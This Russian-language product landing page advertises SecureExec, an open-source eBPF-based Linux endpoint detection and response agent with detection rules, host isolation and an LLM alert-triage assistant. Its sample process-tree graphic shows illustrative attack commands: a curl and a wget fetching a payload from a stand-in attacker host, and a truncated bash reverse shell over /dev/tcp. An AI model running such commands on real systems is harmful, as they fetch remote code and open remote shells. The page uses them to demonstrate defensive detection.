SecureExec
ГлавнаяО насБлогЦены
ВойтиРегистрация
Для команд, которые запускают Linux в production

Обнаруживайте и останавливайте компрометацию Linux-хостов за минуты

Агент с открытым кодом на базе eBPF ловит угрозы от первичного доступа до латерального движения — без тяжёлых агентов и без передачи телеметрии в чужое облако. 20+ встроенных правил детекции, реагирование одним кликом, встроенный AI-аналитик для автоматического триажа алертов, 100% свой хостинг.

Начать бесплатно
Как это работает ↓Техническое описание →

15 минут демо · Покажем детекцию, расследование и реагирование на живом Linux-хосте.

20+
правил детекции
<1%
нагрузки на CPU
60s
установка агента

secureexec-agent
$ dpkg -i secureexec-agent.deb
$ systemctl start secureexec-agent
[INFO] eBPF programs loaded
[INFO] Attached: process_exec, file_open, connect, dns_query
[INFO] gRPC stream connected
[OK] Streaming events → server
SecureExec console — real-time security event stream

Для реальных сценариев атак

От SSH brute-force до полной компрометации хоста — обнаружение, расследование и реагирование.

Поймать reverse shell

Детектирует bash/sh, устанавливающие исходящие соединения — техника #1 пост-эксплуатации. Алерт срабатывает менее чем за 100 мс.

Остановить SSH brute-force

Stateful-детекция повторных ошибок аутентификации. Видите source IP, имя пользователя и тайминги — изолируете хост одним кликом.

Контроль критичных файлов

Отслеживайте записи в /etc/passwd, /etc/shadow, директории cron и authorized_keys. Знайте, кто что и когда изменил.

Расследуйте всю цепочку атаки

Из любого алерта разверните полное дерево процессов: узнайте, как атакующий попал в систему и что он сделал дальше.

Локализуйте инцидент за секунды

Сетевая изоляция одним кликом + уничтожение дерева процессов. Остановите атаку без SSH-сессии на сервер.

Реагирование

Обнаружение и реагирование — не только детекция

Большинство open-source инструментов останавливаются на сборе событий. SecureExec замыкает цикл.

При обнаружении угрозы ваша команда может изолировать хост, уничтожить дерево процессов или заблокировать исполняемый файл — всё из веб-консоли. Без SSH, без ручных действий.

Сетевая изоляция
Отключите хост от сети, не теряя соединение с агентом.
Уничтожить дерево процессов
Завершите всю цепочку атаки от родительского процесса одним кликом.
Блокировка по хешу или пути
Запретите запуск известных вредоносных исполняемых файлов через fanotify — применяется мгновенно.
Глобальный блок-лист
Управляйте правилами блокировки централизованно — они автоматически применяются ко всем устройствам.

Из алерта — в полную историю атаки

SSH brute-force, начальный доступ, загрузка payload, закрепление, C2 — весь инцидент в хронологии, а не в сырых событиях. Каждая запись раскрывается с контекстом процесса, файловыми изменениями и сетевыми соединениями. Фазы атаки (Начальный доступ, Закрепление, C2) назначаются автоматически.

incident-timeline
12:04:01process"sshd" → bash spawned (PID 5678)
12:04:03networkOutbound: 198.51.100.7:443 (TCP)C2
12:04:05fileFile created: /tmp/.payload.shExecution
12:04:06fileFile modified: /etc/cron.d/updatePersistence
12:04:07alertAlert: [high] Cron Persistence
Новинка

AI-аналитик безопасности — ваш встроенный SOC-специалист

LLM-агент, который расследует алерты как старший аналитик — собирает доказательства, строит контекст и выносит вердикт. Работает с любым OpenAI-совместимым провайдером: OpenRouter, Ollama, vLLM или напрямую через API.

Нет выделенного SOC? Не проблема. AI-аналитик автоматически разбирает алерты: проверяет дерево процессов, коррелирует события по хосту, запрашивает информацию об эндпоинтах и историю алертов — и формирует отчёт с вердиктом, уровнем уверенности и рекомендуемыми действиями по реагированию. В режиме авто-триажа расследует каждый новый алерт выше заданного порога серьёзности.

AI investigation — true positive SSH brute-force with 95% confidenceAI investigation — false positive container namespace change with 85% confidence
1
Триаж алерта
Получает алерт, исследует дерево процессов и цепочку предков, запрашивает информацию об эндпоинте и историю алертов — проверяет, является ли активность известным легитимным паттерном.
2
Глубокое расследование
Ищет коррелированные события по хосту, анализирует историю алертов на повторяющиеся паттерны, запрашивает данные threat intelligence по IOC.
3
Вердикт и саммари
Выносит вердикт true_positive / false_positive / needs_review с уровнем уверенности, формирует читаемый нарратив и оценку последствий.
4
Рекомендации по реагированию
Предлагает конкретные действия — изоляция хоста, завершение дерева процессов, блокировка хеша, проверка доступов — приоритизированные по срочности с обоснованием каждого.
Self-Hosted AI
Запускайте с локальной LLM (Ollama, vLLM) — данные не покидают вашу инфраструктуру. Облачные провайдеры (OpenRouter, Anthropic, OpenAI) тоже поддерживаются.
Вердикты с доказательствами
Каждый вывод подкреплён вызовами инструментов к вашим данным. Полный аудит-трейл каждого API-вызова, аргументов и результатов.
Без чёрного ящика
Видно, что именно AI исследовал: каждый вызов инструмента, каждое доказательство, шаги рассуждения — прозрачно, проверяемо, раскрывается в интерфейсе.

Как это работает

От хука в ядре до алерта — менее 100 мс.

1

eBPF-хуки

Tracepoint и kprobe на уровне ядра перехватывают syscall — exec, файловые операции, connect(), DNS-запросы.

2

Rust-агент

События обогащаются контекстом процесса, ID контейнера и именем пользователя, затем передаются через gRPC.

3

Движок детекции

20+ встроенных правил оценивают каждое событие. Кастомные правила поддерживаются через Starlark.

4

Поиск и расследование

События индексируются и доступны для поиска. Дерево процессов, полнотекстовый поиск и расследование алертов в веб-консоли.

Встроенные правила детекции

Готовые к production правила, срабатывающие на реальные угрозы. Настроены на минимум ложных срабатываний с учётом контекста процессов.

SSH Brute-Force

Stateful-детекция повторных неудачных SSH-входов с одного IP во временном окне, с логикой cooldown.

Reverse Shell

Ловит shell-процессы (bash, sh, zsh), устанавливающие исходящие сетевые соединения — техника #1 пост-эксплуатации.

Повышение до root

Детект смены UID на root из не-root процессов, с исключением известных системных сервисов.

Побег из контейнера

Флагирует подозрительные вызовы unshare/setns с флагами user, PID или mount namespace от неожиданных процессов.

Fileless-выполнение

Детект использования memfd_create — основного вектора fileless malware на Linux.

Закрепление через cron

Алерт на создание cron-задач в /etc/cron.* и /var/spool/cron/ не-системными процессами.

Криптомайнер

Детектирует имена процессов майнеров, stratum-паттерны в командных строках, порты майнинг-пулов и известные DNS-запросы пулов.

Ransomware

Алерт на создание ransom note, переименование файлов в encrypted-расширения, массовое переименование файлов и команды уничтожения резервных копий.

Изменение SSH Authorized Keys

Алерт на запись в любой файл .ssh/authorized_keys процессами, кроме ssh-copy-id.

Process Injection

Детект кросс-процессной записи в память через process_vm_writev — используется инструментами инъекции для записи shellcode в другие процессы.

Все 21 правило детекции →

От алерта к графу атаки в один клик

При срабатывании алерта нажмите «Дерево процессов» — увидите полную цепочку выполнения: предки, потомки и коррелированные события безопасности в интерактивном графе. IOC-обогащение автоматически находит другие процессы, работавшие с теми же IP, DNS-именами или файлами, превращая цепочку в полноценный граф атаки. Сократите время расследования с 30 минут до 2.

Подробнее о дереве процессов
sshd
PID 1234 · root
bash
PID 5678 · user
curl attacker.com/payload.sh
PID 5679 · user
reverse_shell
bash -i >& /dev/tcp/...
PID 5680 · user
wget attacker.com/...
PID 9012 · www-data
IOC: ip:198.51.100.7

Создан для Linux-команд безопасности

Всё необходимое для детекции, расследования и реагирования на угрозы на Linux-серверах.

Сбор через eBPF

Видимость на уровне ядра через eBPF — перехват запуска процессов, файловых операций, сетевых соединений и DNS-запросов без слепых зон и с минимальной нагрузкой.

20+ встроенных правил детекции

Готовые правила для SSH brute-force, reverse shell, повышения привилегий, побега из контейнера, fileless malware и техник закрепления.

Граф процессов и IOC

Интерактивный граф в один клик из любого алерта — полная цепочка родитель-потомок, коррелированные события и автоматически обнаруженные IOC-связанные процессы.

100% свой хостинг

Полное развёртывание через Docker Compose на вашей инфраструктуре. Данные не покидают ваши серверы. Поддержка air-gapped сред.

Полнотекстовый поиск

Все события индексируются — мгновенный полнотекстовый поиск по миллионам событий с настраиваемым retention.

Лёгкий агент на Rust

Один бинарник, ноль зависимостей. Менее 1% CPU и минимум памяти на production-серверах — устанавливается за 60 секунд.

Безопасное развёртывание на production Linux

eBPF-first, без kernel moduleUbuntu 20.04+, Debian 11+, RHEL 8+, Amazon Linux 2Один бинарник, без зависимостей< 1% CPU, < 50 МБ RAMУдаление одной командойОпциональный kmod fallback для старых ядер
Open Source

Агент с открытым кодом — нечего скрывать

Агент SecureExec работает на ваших серверах с root-привилегиями. Вы вправе знать, что именно он делает. Полный исходный код агента доступен публично под лицензией Apache 2.0.

Полный аудит кода
Просмотрите каждую строку кода, которая исполняется на вашей инфраструктуре. Ваша команда безопасности может проверить агент до деплоя — доверие не требуется.
Без скрытых бэкдоров
Закрытый агент — это чёрный ящик с root-доступом. С открытым кодом вы можете убедиться, что нет утечки данных, kill-switch или скрытых возможностей.
Сборка из исходников
Клонируйте репозиторий, проверьте код, соберите бинарник сами. Вы контролируете цепочку поставки от исходного кода до деплоя.
Развитие сообществом
Сообщайте о проблемах, предлагайте фичи или вносите вклад напрямую. Агент становится лучше с каждой парой глаз, которая его ревьюит.
Смотреть на GitHub
secureexec-agent
// клонируйте, проверьте, соберите — вы контролируете цепочку поставки
$ git clone https://github.com/secureexec/secureexec-agent
$ cd secureexec-agent
$ make linux-build-docker
=> Compiling Linux agent (static musl binary)
=> target/x86_64-unknown-linux-musl/release/secureexec-agent-linux

Почему не то, что вы уже знаете?

Каждая команда спрашивает: почему не Wazuh, не CrowdStrike и не auditd? Честный ответ.

SecureExec
WazuhCrowdStrike / S1auditd + osquery
Видимость через eBPF
Встроенные правила детекции
Визуализация дерева процессов
Изоляция хоста (1 клик)
Блокировка по хешу / пути
Свой хостинг и air-gapped
Агент < 1% CPU
Агент с открытым кодом
Прозрачное ценообразование

Создан для команд, которым нужны реальные возможности реагирования, а не просто пересылка логов.

Что вы увидите за 15 минут демо

Не слайды. Живой walkthrough на реальном Linux-хосте.

Установка агента
Агент устанавливается на Linux-хост за 60 секунд.
Живая детекция
Алерт срабатывает в реальном времени на живом сценарии атаки.
Таймлайн атаки
Таймлайн инцидента показывает полную историю атаки.
Дерево процессов
Дерево процессов отслеживает всю цепочку выполнения.
Изоляция хоста
Изоляция хоста и завершение дерева процессов одним кликом.
Workflow оповещений
Триаж, назначение, закрытие, создание кейса.

15 минут демо · Покажем детекцию, расследование и реагирование на живом Linux-хосте.

Простые и прозрачные цены

Начните бесплатно, масштабируйтесь по мере роста. Без скрытых платежей.

Сообщество

До 5 хостов — начните прямо сейчас

Бесплатно
  • До 5 Linux-хостов
  • Все типы событий (процессы, файлы, сеть, DNS)
  • 20+ встроенных правил детекции
  • Хранение событий 7 дней
  • Визуализация дерева процессов
  • Веб-консоль и поиск алертов
  • Поддержка сообщества
ПОПУЛЯРНЫЙ

Pro

Неограниченно хостов, полные возможности реагирования

500 ₽/хост/мес
  • Неограниченное количество Linux-хостов
  • Все типы событий + DNS
  • 20+ встроенных + кастомные правила
  • Хранение событий 90 дней
  • Сетевая изоляция (1 клик)
  • Уничтожение дерева процессов
  • Блокировка по хешу / пути
  • Уведомления в Slack / Telegram / Email
  • Поддержка по email

Enterprise

Air-gapped, SSO, выделенный SLA

По запросу
  • Всё из Pro
  • Air-gapped / on-prem развёртывание
  • Интеграция SSO / SAML
  • Гибкие политики хранения данных
  • Персональная помощь с развёртыванием
  • Приоритетная поддержка и SLA
  • Экспорт журнала аудита

Запросить техническое демо с живым сценарием атаки

Начните обнаруживать угрозы на Linux-серверах

Разверните за минуты через Docker Compose или запросите демо для вашей команды.

Начать бесплатно
SecureExec

Лёгкая платформа безопасности конечных точек. Мониторинг процессов, файлов и сетевой активности в режиме реального времени по всему вашему парку устройств.

Продукт
  • Цены
Компания
  • О нас
  • Блог
  • Связаться с отделом продаж
  • Поддержка
Аккаунт
  • Войти
  • Регистрация
Правовая информация
  • Политика конфиденциальности
  • Условия использования

© 2026 SecureExec. Все права защищены.

Built with Rust & Next.js